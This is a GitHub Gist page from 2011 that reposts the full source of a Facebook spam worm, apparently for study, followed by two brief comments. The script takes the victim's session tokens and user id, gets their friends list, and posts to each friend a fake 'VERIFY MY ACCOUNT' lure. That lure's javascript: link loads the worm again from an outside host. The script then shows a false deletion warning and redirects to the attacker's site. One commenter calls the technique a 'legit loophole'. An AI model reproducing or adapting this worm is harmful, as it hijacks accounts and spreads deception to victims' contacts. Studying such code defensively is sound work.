Created
May 12, 2011 05:00
-
-
Save ivarvong/967951 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
THIS CODE IS FROM http://plucketenhe.info/verify.js | |
I AM POSTING IT HERE JUST TO BE ABLE TO STUDY IT. IT IS NOT MINE. | |
*/ | |
var message = "In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process..."; | |
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; | |
var myText = "==>[VERIFY MY ACCOUNT]<=="; | |
var post_form_id = document.getElementsByName('post_form_id')[0].value; | |
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; | |
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); | |
var friends = new Array(); | |
gf = new XMLHttpRequest(); | |
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); | |
gf.send(); | |
if(gf.readyState!=4){ }else{ | |
data = eval('(' + gf.responseText.substr(9) + ')'); | |
if(data.error){ }else{ | |
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;}); | |
} | |
} | |
for(var i=0; i<friends.length; i++){ | |
var httpwp = new XMLHttpRequest(); | |
var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; | |
var paramswp = "&__d=1&app_id=6628568379&extern=0&" + | |
"&post_form_id=" + post_form_id + | |
"&fb_dtsg=" + fb_dtsg + | |
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + | |
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + | |
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + | |
"&user_message=" + message; | |
httpwp.open("POST", urlwp, true); | |
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); | |
httpwp.setRequestHeader("Content-length", paramswp.length); | |
httpwp.setRequestHeader("Connection", "keep-alive"); | |
httpwp.onreadystatechange = function(){ | |
if (httpwp.readyState == 4 && httpwp.status == 200){ | |
} | |
} | |
httpwp.send(paramswp); | |
} | |
alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted."); | |
document.location = "http://plucketenhe.info/verify.php?js"; |
This looks like a legit loophole. It's using Facebook's app id to perform the updates. No permissions required.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thanx. I just found this because of the same reason.